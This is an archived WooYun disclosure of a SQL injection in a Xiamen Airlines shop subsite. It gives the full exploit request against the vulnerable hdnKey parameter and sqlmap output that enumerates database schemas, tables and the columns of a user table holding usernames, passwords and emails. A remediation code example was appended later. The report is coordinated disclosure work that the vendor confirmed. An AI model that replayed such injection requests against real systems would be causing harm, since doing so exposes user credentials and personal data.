
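Vulnerability summary

Bug ID: wooyun-2015-0124157

Vulnerability title: SQL injection vulnerability in a Xiamen Airlines subsite

Vendor: xiamenair.com

Reported by: 撸撸侠

Submitted: 2015-07-02 18:12

Fixed: 2015-08-20 10:02

Disclosed: 2015-08-20 10:02

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org. For questions or help, contact [email protected]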



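Vulnerability details

Disclosure status:

2015-07-02: Details reported to the vendor; awaiting vendor handling
2015-07-06: Vendor confirmed; details disclosed to the vendor only
2015-07-16: Details disclosed to core white hats and experts in related fields
2015-07-26: Details disclosed to regular white hats
2015-08-05: Details disclosed to intern white hats
2015-08-20: Details disclosed to the public

Brief description:

Detailed description: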

POST http://shop.xiamenair.com/prolist.aspx?k=a HTTP/1.1
Host: shop.xiamenair.com
Proxy-Connection: keep-alive
Content-Length: 6841
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://shop.xiamenair.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://shop.xiamenair.com/prolist.aspx?k=a
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: ASP.NET_SessionId=15i2bh55102uuc3z34qndimd
AlexaToolbar-ALX_NS_PH: AlexaToolbar/alxg-3.3

__EVENTTARGET=paging1%24datPageNumber%24ctl01%24btnPageNumber&__EVENTARGUMENT=&__LASTFOCUS=&__LastVIEWSTATE_SessionKey=70914066-cf2b-49b9-900f-a78060093aba&__VIEWSTATE=[omitted]&__EVENTVALIDATION=[omitted]&Left1%24txtKey=a&hdnMoneyState=0&hdnIsChange=0&ddlstOrderBy=1&hdnKey=a&hdnOrder=&hdnPageIndex=1&hdnOrderState=1&hdnPageSize=20&hdnNoteCount=28&paging1%24HFPageCount=2&paging1%24hdnPageIndex=1


The hdnKey parameter is vulnerable to SQL injection.

Proof of vulnerability:

[1] place: POST, parameter: hdnKey, type: Single quoted string
[q] Quit
> 1
[06:03:27] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Oracle
[06:03:27] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[06:03:27] [INFO] fetching database (schema) names
[06:03:27] [INFO] the SQL query used returns 4 entries
[06:03:27] [INFO] resumed: SYS
[06:03:27] [INFO] resumed: SYSTEM
[06:03:27] [INFO] resumed: XHSHOPADM
[06:03:27] [INFO] resumed: XMAIR
available databases [4]:
[*] SYS
[*] SYSTEM
[*] XHSHOPADM
[*] XMAIR


Database: XHSHOPADM
[30 tables]
+------------------------+
| PBCATCOL |
| PBCATEDT |
| PBCATFMT |
| PBCATTBL |
| PBCATVLD |
| T_ADMIN |
| T_ADVERTISEMENT |
| T_AREA |
| T_BASETYPE |
| T_COLLECTION |
| T_FUNCTION |
| T_INDEXPICTURE |
| T_INFORMATION |
| T_LINK |
| T_ORDER |
| T_ORDERADDRESS |
| T_ORDERPRODUCT |
| T_ORDERPRODUCTDETAILED |
| T_PRODUCT |
| T_PRODUCTPICTURE |
| T_ROLE |
| T_ROLEFUNCTION |
| T_SCORESDYNAMIC |
| T_SHOPPINGCART |
| T_SHOPPINGCARTDETAILED |
| T_SYSCONFIG |
| T_USER |
| T_USERADDRESS |
| T_USERINFO |
| T_WEBSITE |
+------------------------+


[06:06:15] [INFO] fetching columns for table 'T_USER' in database 'XHSHOPADM'
[06:06:15] [INFO] the SQL query used returns 12 entries
[06:06:16] [INFO] retrieved: MILE
[06:06:16] [INFO] retrieved: NUMBER
[06:06:16] [INFO] retrieved: ID
[06:06:16] [INFO] retrieved: NUMBER
[06:06:17] [INFO] retrieved: USERNAME
[06:06:17] [INFO] retrieved: VARCHAR2
[06:06:17] [INFO] retrieved: NICENAME
[06:06:17] [INFO] retrieved: VARCHAR2
[06:06:18] [INFO] retrieved: PWORD
[06:06:18] [INFO] retrieved: VARCHAR2
[06:06:18] [INFO] retrieved: PHOTO
[06:06:18] [INFO] retrieved: VARCHAR2
[06:06:19] [INFO] retrieved: STATE
[06:06:19] [INFO] retrieved: CHAR
[06:06:19] [INFO] retrieved: SCORES
[06:06:19] [INFO] retrieved: NUMBER
[06:06:20] [INFO] retrieved: TYPEID
[06:06:20] [INFO] retrieved: NUMBER
[06:06:20] [INFO] retrieved: ADDDATE
[06:06:20] [INFO] retrieved: DATE
[06:06:21] [INFO] retrieved: EMAIL
[06:06:21] [INFO] retrieved: VARCHAR2
[06:06:21] [INFO] retrieved: XHCODE
[06:06:21] [INFO] retrieved: VARCHAR2
[06:06:21] [INFO] fetching entries for table 'T_USER' in database 'XHSHOPADM'
[06:06:22] [INFO] the SQL query used returns 55603 entries

Remediation:
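An added example, not part of the original report or the vendor's code: the single-quoted string context reported for hdnKey, shown as a concatenated query beside a bound-parameter version with LIKE wildcard escaping. SQLite stands in for the Oracle back end, and the function names, the t_product columns and the sample rows are assumptions constructed for illustration.

```python
import sqlite3

def make_db():
    # Constructed sample rows; SQLite stands in for the Oracle back end.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE t_product (id INTEGER PRIMARY KEY, name TEXT)")
    db.executemany("INSERT INTO t_product VALUES (?, ?)", [
        (1, "travel adapter"), (2, "model plane"),
        (3, "100% cotton cap"), (4, "pilot's logbook"),
    ])
    return db

def search_vulnerable(db, hdn_key):
    # Weak pattern (hypothetical reconstruction): the posted hidden-field
    # value is pasted into a single-quoted literal, so any quote in the
    # value ends the literal and the rest is parsed as SQL.
    sql = ("SELECT id FROM t_product WHERE name LIKE '%" + hdn_key +
           "%' ORDER BY id")
    return [row[0] for row in db.execute(sql)]

def escape_like(value, esc="\\"):
    # Make the escape character, % and _ match literally inside LIKE.
    for ch in (esc, "%", "_"):
        value = value.replace(ch, esc + ch)
    return value

def search_safe(db, hdn_key, max_len=64):
    # Hidden fields are client-controlled: validate them like any input.
    if not isinstance(hdn_key, str) or len(hdn_key) > max_len:
        raise ValueError("invalid search key")
    pattern = "%" + escape_like(hdn_key) + "%"
    # The value travels as a bound parameter and is never parsed as SQL.
    sql = "SELECT id FROM t_product WHERE name LIKE ? ESCAPE '\\' ORDER BY id"
    return [row[0] for row in db.execute(sql, (pattern,))]

if __name__ == "__main__":
    db = make_db()
    for key in ("plane", "%", "pilot's"):
        try:
            weak = search_vulnerable(db, key)
        except sqlite3.OperationalError as exc:
            weak = "SQL error: %s" % exc
        print(repr(key), "concatenated:", weak, "bound:", search_safe(db, key))
```

On Oracle the same fix is a named bind variable such as :key in place of the ? placeholder.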

Copyright notice: when reposting, please credit the source 撸撸侠@乌云


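Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 7

Confirmed: 2015-07-06 10:01

Vendor reply:

Confirmed. Thank you for supporting Xiamen Airlines' information security work.

Latest status:

None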

